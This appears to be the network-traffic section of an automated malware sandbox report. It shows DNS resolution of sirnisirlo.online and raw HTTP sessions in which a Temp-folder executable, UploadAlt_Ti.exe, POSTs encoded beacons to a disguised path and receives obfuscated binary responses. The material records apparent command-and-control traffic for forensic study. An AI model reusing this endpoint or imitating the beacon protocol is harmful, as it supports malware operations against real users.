                                                                                                                Nov 14, 2024 19:57:45.235333920 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.235730886 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.235774040 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.235790968 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.236711979 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.236772060 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.236787081 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.277446985 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.323573112 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.354753017 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.354784966 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.354957104 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.355026007 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.355084896 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.355108976 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.355127096 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.355127096 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.355149984 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.355195999 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.356137991 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.356200933 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.356220961 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.356244087 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.356260061 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.356316090 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.473472118 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.474077940 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.474101067 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.474131107 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.474210978 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.474261045 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.474589109 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.475600958 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.475629091 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.475655079 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.475656986 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.475667953 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.475739002 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.475934982 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.475994110 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.476007938 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.476035118 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.476089001 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.476157904 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.476197004 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.476222038 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.476237059 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.544794083 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.544847965 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.544905901 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.545201063 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.545221090 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.191381931 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.191473961 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.192676067 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.192688942 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.193041086 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.194052935 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.194092035 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.194097042 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.600466013 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.600585938 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.600698948 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.601035118 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.601056099 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.601072073 CET49266443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.601078033 CET44349266188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.669291973 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.669348955 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:46.669428110 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.669961929 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:46.669991970 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:47.567291975 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:47.567375898 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:47.568995953 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:47.569055080 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:47.569432020 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:47.570429087 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:47.570481062 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:47.570494890 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:48.209877014 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:48.209942102 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:48.210033894 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:48.210186005 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:48.210210085 CET44349267188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:48.210227013 CET49267443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:48.210237026 CET44349267188.114.97.3192.168.2.7
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 14, 2024 19:56:20.999033928 CET53618491.1.1.1192.168.2.7
                                                                                                                Nov 14, 2024 19:56:26.253819942 CET53495621.1.1.1192.168.2.7
                                                                                                                Nov 14, 2024 19:56:52.405152082 CET5307153192.168.2.71.1.1.1
                                                                                                                Nov 14, 2024 19:56:52.446156979 CET53530711.1.1.1192.168.2.7
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 14, 2024 19:56:52.405152082 CET192.168.2.71.1.1.10x8fe0Standard query (0)sirnisirlo.onlineA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 14, 2024 19:56:52.446156979 CET1.1.1.1192.168.2.70x8fe0No error (0)sirnisirlo.online188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                Nov 14, 2024 19:56:52.446156979 CET1.1.1.1192.168.2.70x8fe0No error (0)sirnisirlo.online188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                • sirnisirlo.online
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749180188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:56:53 UTC372OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                Content-Length: 96
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:56:53 UTC96OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                2024-11-14 18:56:54 UTC800INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 14 Nov 2024 18:56:53 GMT
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq7PgGGnnJ05aFuXV0fu5jEQ3bx13Jh9cdpFV4YDYT45Pkp7JSSkX9sAOEsOi384GOEhob%2FA1EuIylLqCYQxnhVHWwYXIRqanJdPJNpxdQg4F4KHbjdEcMNgMdwXMaHtIOG5gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e29395f1c56798a-DEN
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18987&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1104&delivery_rate=152629&cwnd=32&unsent_bytes=0&cid=a0f36174208192aa&ts=575&x=0"
                                                                                                                2024-11-14 18:56:54 UTC17INData Raw: 63 0d 0a 00 00 00 00 00 00 00 00 6a 7a 00 00 0d 0a
                                                                                                                Data Ascii: cjz
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 33 37 63 61 0d 0a c8 dd 6d 32 14 00 4c 0a 60 03 01 00 19 1d 0e 1f 19 41 08 a2 bf bf 60 03 8a 08 23 72 9c 5a 99 86 00 10 00 0c 09 98 01 04 00 19 1d 0e 1f 19 41 04 a1 c4 c4 98 01 48 95 ae c0 e7 42 da ce 14 00 6b 0b 59 02 0c 00 19 1d 0e 1f 19 41 08 cb bf bf 59 02 8a 08 23 72 9c 5a 99 86 15 17 b9 b8 36 b4 3a b2 96 bb b0 36 10 00 b5 08 79 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 79 0f 8b c5 a3 15 78 1e a8 39 14 00 be 08 f8 08 0a 00 19 1d 0e 1f 19 41 08 08 bf bf f8 08 8a 08 23 72 9c 5a 99 86 26 b7 b3 b4 37 10 22 b0 3a b0 10 00 cf 07 4f 07 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 4f 07 25 87 27 47 82 9f 2c 6b 10 00 24 0f 5d 00 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 5d 00 5b cb 8f 2d fd d3 84 01 14 00 59 04 e9 07 05 00 19 1d 0e 1f 19 41 08 cb bf bf e9 07 8a 08 23 72 9c 5a
                                                                                                                Data Ascii: 37cam2L`A`#rZAHBkYAY#rZ6:6yAyx9A#rZ&7":OAO%'G,k$]A][-YA#rZ
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 3a 2e a7 33 33 b4 b1 b2 2e 98 1b 17 18 2e a7 ba 3a 36 b7 b7 b5 2e 28 39 b7 33 b4 36 b2 b9 2e a7 ba 3a 36 b7 b7 b5 2e 9c 99 9b 9a a1 23 23 18 1a 98 99 98 98 98 32 99 21 1c 1c a0 18 18 98 18 1a 21 19 a0 1b 1b 9b 1b 14 00 be 01 ba 0d 0a 00 19 1d 0e 1f 19 41 08 52 bf bf ba 0d 8a 08 23 72 9c 5a 99 86 38 b5 b1 b9 98 98 17 3a 3c 3a 14 00 02 03 7d 03 11 00 19 1d 0e 1f 19 41 08 08 bf bf 7d 03 8a 08 23 72 9c 5a 99 86 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 14 00 09 04 4b 00 07 00 19 1d 0e 1f 19 41 08 ec bf bf 4b 00 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 bd 04 6a 0d 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 6a 0d d0 f7 00 81 71 ef 0b ad 14 00 1a 0e 7f 0a 0a 00 19 1d 0e 1f 19 41 08 3b bf bf 7f 0a 8a 08 23 72 9c 5a 99 86 b1 b7 37 33 b4 b3 af b2 3c 3a
                                                                                                                Data Ascii: :.33..:6.(936.:6.##2!!AR#rZ8:<:}A}#rZ49199KAK#rZ)6+'jA;jqA;#rZ73<:
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 05 29 02 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 29 02 2d 18 97 ed 0c a0 82 d1 01 86 24 9b d2 d9 f3 20 10 00 30 0b 60 09 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 60 09 76 31 4a 94 d5 2d 41 b8 10 00 cc 0d e7 08 04 00 19 1d 0e 1f 19 41 04 3b c4 c4 e7 08 e6 0d 49 2b 44 15 42 07 14 00 51 0c 3c 04 08 00 19 1d 0e 1f 19 41 08 a2 e3 e3 3c 04 81 dc 5b 0d 41 97 00 aa a8 42 e8 7b 9f ee 71 5b 10 00 fa 0d 82 0d 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 82 0d e1 58 2d 69 42 a1 d3 40 10 00 e1 02 e7 01 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 e7 01 8e c9 c4 57 2d 30 3a 7e 14 00 89 0d 35 0e 07 00 19 1d 0e 1f 19 41 08 ec bf bf 35 0e 8a 08 23 72 9c 5a 99 86 29 b2 b0 36 2b 27 a1 10 00 22 0f 78 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 78 04 85 46 79 84 27 5e 72 a8 14 00 86 0a 11 0a 08 00 19 1d 0e
                                                                                                                Data Ascii: )A)-$ 0`A`v1J-AA;I+DBQ<A<[AB{q[AX-iB@AW-0:~5A5#rZ)6+'"xAxFy'^r
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 9c 99 99 18 1b 9a 98 9b 18 98 19 9b 98 9c 19 19 10 00 9a 04 91 06 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 91 06 4d 4d 0d c3 be 96 06 ef 14 00 f0 01 30 03 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 30 03 ce 18 c6 12 71 77 c6 fc e3 86 75 64 af 0e b7 0d 14 00 26 09 6d 06 12 00 19 1d 0e 1f 19 41 08 52 bf bf 6d 06 8a 08 23 72 9c 5a 99 86 33 b7 39 b6 34 b4 b9 3a b7 39 bc 17 b9 b8 36 b4 3a b2 14 00 be 04 62 0a 17 00 19 1d 0e 1f 19 41 08 a2 bf bf 62 0a 8a 08 23 72 9c 5a 99 86 33 b4 36 b2 af 3a 39 b0 37 b9 33 b2 39 af 3a 39 b0 b1 b2 17 3a 3c 3a 10 00 4f 08 f1 04 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 f1 04 f1 f9 20 4e 53 e1 2b 62 14 00 89 06 96 0c 08 00 19 1d 0e 1f 19 41 08 08 bf bf 96 0c 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 81 03 4b 0d 08 00 19 1d 0e 1f 19 41
                                                                                                                Data Ascii: AMM0A0qwud&mARm#rZ394:96:bAb#rZ36:9739:9:<:OA NS+bA#rZ8936KA
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 8a 08 23 72 9c 5a 99 86 29 22 28 14 00 a7 03 fe 0a 08 00 19 1d 0e 1f 19 41 08 b7 e3 e3 fe 0a 75 87 45 c9 44 2e af a7 5d 19 f6 bf 9a 57 de 56 10 00 db 00 47 0c 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 47 0c 6e 8a c2 b3 cc 92 c9 9f 14 00 5e 06 0f 0f 07 00 19 1d 0e 1f 19 41 08 08 bf bf 0f 0f 8a 08 23 72 9c 5a 99 86 a1 aa 29 29 a2 27 2a 10 00 0d 0a c1 0b 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 c1 0b db e9 d6 61 79 f1 dd 4d 14 00 e5 05 86 0e 0e 00 19 1d 0e 1f 19 41 08 52 bf bf 86 0e 8a 08 23 72 9c 5a 99 86 b1 b7 b7 b5 b4 b2 b9 17 b9 b8 36 b4 3a b2 10 00 bb 02 54 0a 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 54 0a a0 98 92 48 03 84 99 64 14 00 e8 04 33 07 04 00 19 1d 0e 1f 19 41 08 08 bf bf 33 07 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 1d 0a 8c 06 06 00 19 1d 0e 1f 19 41 08
                                                                                                                Data Ascii: #rZ)"(AuED.]WVGAGn^A#rZ))'*AayMAR#rZ6:TATHd3A3#rZ&A
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 2d 57 9a c3 96 07 8c ef 5b 89 e3 b2 67 14 00 38 00 e2 0b 08 00 19 1d 0e 1f 19 41 08 52 bf bf e2 0b 8a 08 23 72 9c 5a 99 86 38 39 b7 33 b4 36 b2 b9 14 00 0d 0e 6a 0f 0b 00 19 1d 0e 1f 19 41 08 08 bf bf 6a 0f 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b0 3a b2 14 00 dd 01 f0 07 08 00 19 1d 0e 1f 19 41 08 ec e3 e3 f0 07 dd 40 13 8a 82 4d e7 2c f5 de a0 fc 5c 34 96 dd 14 00 76 0b f7 01 04 00 19 1d 0e 1f 19 41 08 08 bf bf f7 01 8a 08 23 72 9c 5a 99 86 26 a7 a1 a5 14 00 d9 09 f4 0d 23 00 19 1d 0e 1f 19 41 08 fb bf bf f4 0d 8a 08 23 72 9c 5a 99 86 32 b4 b9 b1 b7 39 32 b1 b0 37 b0 39 bc 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 14 00 58 05 34 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 34 01 38 64 e3 05 19 0e 28 b5 11 fa 50 73 c7 77 59 44
                                                                                                                Data Ascii: -W[g8AR#rZ8936jAj#rZ&6::A@M,\4vA#rZ&#A#rZ29279.&6:9.6;621X4A48d(PswYD
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 00 19 1d 0e 1f 19 41 04 fb c4 c4 d2 0c 0b 84 52 59 a9 9c 59 75 10 00 85 01 56 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 56 0f cf 5d 1e a8 7c 62 15 84 14 00 32 0a 46 02 06 00 19 1d 0e 1f 19 41 08 9b bf bf 46 02 8a 08 23 72 9c 5a 99 86 a3 ba b0 39 32 b0 14 00 ad 04 b3 0a 05 00 19 1d 0e 1f 19 41 08 08 bf bf b3 0a 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 14 00 99 0f 69 04 05 00 19 1d 0e 1f 19 41 08 08 bf bf 69 04 8a 08 23 72 9c 5a 99 86 15 17 36 32 31 10 00 64 0d 94 04 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 94 04 0a 4a 03 d6 b9 75 08 fa 14 00 36 0d 2d 08 0e 00 19 1d 0e 1f 19 41 08 b7 bf bf 2d 08 8a 08 23 72 9c 5a 99 86 36 b7 b3 b4 37 ba b9 b2 39 b9 17 3b 32 33 14 00 1b 0a 18 00 09 00 19 1d 0e 1f 19 41 08 3b bf bf 18 00 8a 08 23 72 9c 5a 99 86 28 39 b7 3a b7 37 2b 28
                                                                                                                Data Ascii: ARYYuVAV]|b2FAF#rZ92A#rZ621iAi#rZ621dAJu6-A-#rZ679;23A;#rZ(9:7+(
                                                                                                                2024-11-14 18:56:54 UTC1369INData Raw: 5a 99 86 a1 34 39 b7 b6 b2 14 00 96 03 70 07 0d 00 19 1d 0e 1f 19 41 08 cb bf bf 70 07 8a 08 23 72 9c 5a 99 86 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 10 00 1e 03 12 0f 04 00 19 1d 0e 1f 19 41 04 9b c4 c4 12 0f 20 5d ae 5c 83 a4 50 75 14 00 d5 09 a2 0e 08 00 19 1d 0e 1f 19 41 08 9b e3 e3 a2 0e 3e 89 04 ce 64 9d ac 84 16 17 b7 b8 ba e4 dd 75 14 00 72 0f bf 01 13 00 19 1d 0e 1f 19 41 08 ec bf bf bf 01 8a 08 23 72 9c 5a 99 86 38 b0 b9 b9 bb b7 39 32 b9 17 b2 37 b1 b6 b0 b9 3a b2 39 14 00 f0 0b 10 0a 2a 00 19 1d 0e 1f 19 41 08 cb bf bf 10 0a 8a 08 23 72 9c 5a 99 86 a7 ba 3a 36 b7 b7 b5 ab b4 37 a0 38 38 a1 36 b0 b9 b9 b4 b1 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 14 00 b2 0c 8d 01 08 00 19 1d 0e 1f 19 41 08 cb e3 e3 8d 01 00 e4 f3 cb
                                                                                                                Data Ascii: Z49pAp#rZ&6:9A ]\PuA>durA#rZ8927:9*A#rZ:67886.88":.&6.:6A


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.749191188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:56:55 UTC449OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 53
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:56:55 UTC53OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii:
                                                                                                                2024-11-14 18:56:56 UTC722INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 14 Nov 2024 18:56:56 GMT
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h9N9mILsRFEHWHcEqBJAxrcu11sgpXKEz7X5xxLN2E7TaOjk14sMHgL9gt9XNHlRbuM5XMUwd2F7IoKLrJzu8tIc2CZhMdA3q7qLGIIwa0u51JYHU7cH9cuJ8AQiG2Lebjo31g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e29396b2d3ad77b-NRT
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=142480&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1138&delivery_rate=20327&cwnd=32&unsent_bytes=0&cid=087bc0915dd30d44&ts=923&x=0"
                                                                                                                2024-11-14 18:56:56 UTC24INData Raw: 31 32 0d 0a 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 90 0d 0a
                                                                                                                Data Ascii: 12
                                                                                                                2024-11-14 18:56:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.749202188.114.97.34432176C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-14 18:56:56 UTC450OUTPOST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                Content-Length: 208
                                                                                                                Host: sirnisirlo.online
                                                                                                                2024-11-14 18:56:56 UTC208OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 95 00 00 00 2b ca 03 02 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 81 00 00 00 95 65 81 01 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 95 65 81 01 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                Data Ascii: +#eeI`H1e(((
                                                                                                                2024-11-14 18:56:57 UTC785INHTTP/1.1 204 No Content
                                                                                                                Date: Thu, 14 Nov 2024 18:56:57 GMT
                                                                                                                Connection: close
                                                                                                                gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93Jp1KLNmHB2hxMAvA6V5qXzGUptXVXfjSIINzzVz9DKN4fn6vydobqTRHy97DZ%2BhQ4Ejjl%2FEKD5EMKPRDy3LCWQ6GWKZJWLb2sIPVyFSvZQeATaxlnC4E%2B2sYJFPGdr%2BpgqHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8e293974ab456aee-BUF
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=33123&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1294&delivery_rate=87058&cwnd=32&unsent_bytes=0&cid=338cb712809bfe91&ts=364&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
